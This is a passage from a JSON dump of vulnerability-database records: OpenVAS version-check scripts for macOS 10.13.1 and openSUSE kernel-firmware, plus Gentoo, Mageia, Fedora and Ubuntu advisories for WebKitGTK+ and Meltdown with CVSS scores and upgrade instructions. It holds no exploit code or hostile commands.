script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2017-13876\", \"CVE-2017-13875\", \"CVE-2017-13871\", \"CVE-2017-13860\",\n\t\t\"CVE-2017-13883\", \"CVE-2017-13848\", \"CVE-2017-13858\", \"CVE-2017-13878\",\n\t \"CVE-2017-13865\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-12-07 10:51:33 +0530 (Thu, 07 Dec 2017)\");\n script_name(\"Apple MacOSX Security Updates(HT208331)-04\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Security update resolves,\n\n - A memory corruption issue was addressed with improved memory handling.\n\n - An out-of-bounds read was addressed through improved bounds checking.\n\n - A logic error existed in the validation of credentials.\n\n - An inconsistent user interface issue was addressed with improved state management.\n\n - An input validation issue existed in the kernel.\n\n - An out-of-bounds read issue existed that led to the disclosure of kernel memory.\n\n - A validation issue was addressed with improved input sanitization.\n\n - An encryption issue existed with S/MIME credentials.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code with kernel and system privileges. Also\n attacker may be able to bypass administrator authentication without supplying\n the administrator's password.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X version 10.13.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X 10.13.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208331\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.13\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.13\" || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nif(osVer == \"10.13.1\")\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"10.13.2\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-14T18:49:05", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-12-04T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for kernel-firmware (openSUSE-SU-2017:3144-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13080", "CVE-2017-13081"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851654", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851654", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851654\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-12-04 18:47:56 +0530 (Mon, 04 Dec 2017)\");\n script_cve_id(\"CVE-2017-13080\", \"CVE-2017-13081\");\n script_tag(name:\"cvss_base\", value:\"2.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for kernel-firmware (openSUSE-SU-2017:3144-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel-firmware'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for kernel-firmware fixes the following issues:\n\n - Update Intel WiFi firmwares for the 3160, 7260 and 7265 adapters.\n\n Security issues fixed are part of the 'KRACK' attacks affecting the\n firmware:\n\n - CVE-2017-13080: The reinstallation of the Group Temporal key could be\n used for replay attacks (bsc#1066295):\n\n - CVE-2017-13081: The reinstallation of the Integrity Group Temporal key\n could be used for replay attacks (bsc#1066295):\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\");\n\n script_tag(name:\"affected\", value:\"kernel-firmware on openSUSE Leap 42.3, openSUSE Leap 42.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:3144-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSELeap42\\.2|openSUSELeap42\\.3)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~20170530~7.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ucode-amd\", rpm:\"ucode-amd~20170530~7.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~20170530~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ucode-amd\", rpm:\"ucode-amd~20170530~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 2.9, "vector": "AV:A/AC:M/Au:N/C:N/I:P/A:N"}}], "gentoo": [{"lastseen": "2022-01-17T19:04:39", "description": "### Background\n\nWebKitGTK+ is a full-featured port of the WebKit rendering engine.\n\n### Description\n\nMultiple vulnerabilities have been discovered in WebkitGTK+. Please review the referenced CVE Identifiers for details. \n\n### Impact\n\nAn attacker, by enticing a user to visit maliciously crafted web content, may be able to execute arbitrary code or cause memory corruption. \n\n### Workaround\n\nThere are no known workarounds at this time.\n\n### Resolution\n\nAll WebkitGTK+ users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-libs/webkit-gtk-2.18.4:4\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-07T00:00:00", "type": "gentoo", "title": "WebkitGTK+: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7157"], "modified": "2018-01-07T00:00:00", "id": "GLSA-201801-09", "href": "https://security.gentoo.org/glsa/201801-09", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-17T19:04:29", "description": "### Background\n\nWebKitGTK+ is a full-featured port of the WebKit rendering engine, suitable for projects requiring any kind of web integration, from hybrid HTML/CSS applications to full-fledged web browsers. \n\n### Description\n\nMultiple vulnerabilities have been discovered in WebKitGTK+. Please review the referenced CVE identifiers for details. \n\n### Impact\n\nAn attacker could execute arbitrary commands via maliciously crafted web content. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll WebKitGTK+ users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-libs/webkit-gtk-2.18.6\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-22T00:00:00", "type": "gentoo", "title": "WebKitGTK+: Multiple Vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4089", "CVE-2018-4096"], "modified": "2018-03-22T00:00:00", "id": "GLSA-201803-11", "href": "https://security.gentoo.org/glsa/201803-11", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "The webkit2 package has been updated to version 2.18.4, fixing several security issues and other bugs. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-01T01:17:34", "type": "mageia", "title": "Updated webkit2 packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7157"], "modified": "2018-01-01T01:17:34", "id": "MGASA-2018-0005", "href": "https://advisories.mageia.org/MGASA-2018-0005.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-18T11:19:34", "description": "The webkit2 package has been updated to version 2.18.6, fixing several security issues and other bugs. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-27T09:19:00", "type": "mageia", "title": "Updated webkit2 packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4089", "CVE-2018-4096"], "modified": "2018-01-27T09:19:00", "id": "MGASA-2018-0102", "href": "https://advisories.mageia.org/MGASA-2018-0102.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-09T16:52:27", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: webkitgtk4-2.18.4-1.fc26", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156"], "modified": "2018-01-09T16:52:27", "id": "FEDORA:B0AFE6075EE6", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4RIN3K3F4NWIVHG7VSEDRVHKMAB2UCC2/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-28T02:56:27", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: webkitgtk4-2.18.4-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156"], "modified": "2017-12-28T02:56:27", "id": "FEDORA:8E50360491B7", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/XRYO7XC2EWI6UKLYRIYC5MTUC27I36GS/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-28T21:33:51", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: webkitgtk4-2.18.6-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4096"], "modified": "2018-01-28T21:33:51", "id": "FEDORA:F117D6006273", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/KWUXL4ATBJKWKT5ABIGAYICHPARJJPHW/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-02T16:58:50", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: webkitgtk4-2.18.6-1.fc26", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4096"], "modified": "2018-02-02T16:58:50", "id": "FEDORA:F21276042F34", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/KWKKPQBMNY3CM2C5DPUKJQX5ITUAD4HC/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2023-01-26T13:11:46", "description": "## Releases\n\n * Ubuntu 17.10 \n * Ubuntu 17.04 \n * Ubuntu 16.04 ESM\n\n## Packages\n\n * webkit2gtk \\- Web content engine library for GTK+\n\nA large number of security issues were discovered in the WebKitGTK+ Web and \nJavaScript engines. If a user were tricked into viewing a malicious \nwebsite, a remote attacker could exploit a variety of issues related to web \nbrowser security, including cross-site scripting attacks, denial of service \nattacks, and arbitrary code execution.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-03T00:00:00", "type": "ubuntu", "title": "WebKitGTK+ vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156"], "modified": "2018-01-03T00:00:00", "id": "USN-3514-1", "href": "https://ubuntu.com/security/notices/USN-3514-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-26T13:11:06", "description": "## Releases\n\n * Ubuntu 17.10 \n * Ubuntu 16.04 ESM\n\n## Packages\n\n * webkit2gtk \\- Web content engine library for GTK+\n\nMultiple security issues were discovered in the WebKitGTK+ Web and \nJavaScript engines. If a user were tricked in to opening a specially \ncrafted website, an attacker could potentially exploit these to cause a \ndenial of service, spoof the user interface, or execute arbitrary code. \n(CVE-2018-4088, CVE-2018-4096, CVE-2017-7153, CVE-2017-7160, \nCVE-2017-7161, CVE-2017-7165, CVE-2017-13884, CVE-2017-13885)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-30T00:00:00", "type": "ubuntu", "title": "WebKitGTK+ vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4096"], "modified": "2018-01-30T00:00:00", "id": "USN-3551-1", "href": "https://ubuntu.com/security/notices/USN-3551-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-26T13:11:41", "description": "## Releases\n\n * Ubuntu 14.04 ESM\n\n## Packages\n\n * linux-aws \\- Linux kernel for Amazon Web Services (AWS) systems\n * linux-lts-xenial \\- Linux hardware enablement kernel from Xenial for Trusty\n\nUSN-3522-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu \n14.04 LTS.\n\nJann Horn discovered that microprocessors utilizing speculative execution \nand indirect branch prediction may allow unauthorized memory reads via \nsidechannel attacks. This flaw is known as Meltdown. A local attacker could \nuse this to expose sensitive information, including kernel memory. \n(CVE-2017-5754)\n", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-09T00:00:00", "type": "ubuntu", "title": "Linux (Xenial HWE) vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2018-01-09T00:00:00", "id": "USN-3522-2", "href": "https://ubuntu.com/security/notices/USN-3522-2", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-26T13:11:34", "description": "## Releases\n\n * Ubuntu 16.04 ESM\n\n## Packages\n\n * linux \\- Linux kernel\n\nUSN-3522-1 fixed a vulnerability in the Linux kernel to address \nMeltdown (CVE-2017-5754). Unfortunately, that update introduced \na regression where a few systems failed to boot successfully. This \nupdate fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nJann Horn discovered that microprocessors utilizing speculative execution \nand indirect branch prediction may allow unauthorized memory reads via \nsidechannel attacks. This flaw is known as Meltdown. A local attacker could \nuse this to expose sensitive information, including kernel memory.\n", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-10T00:00:00", "type": "ubuntu", "title": "Linux kernel regression", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", 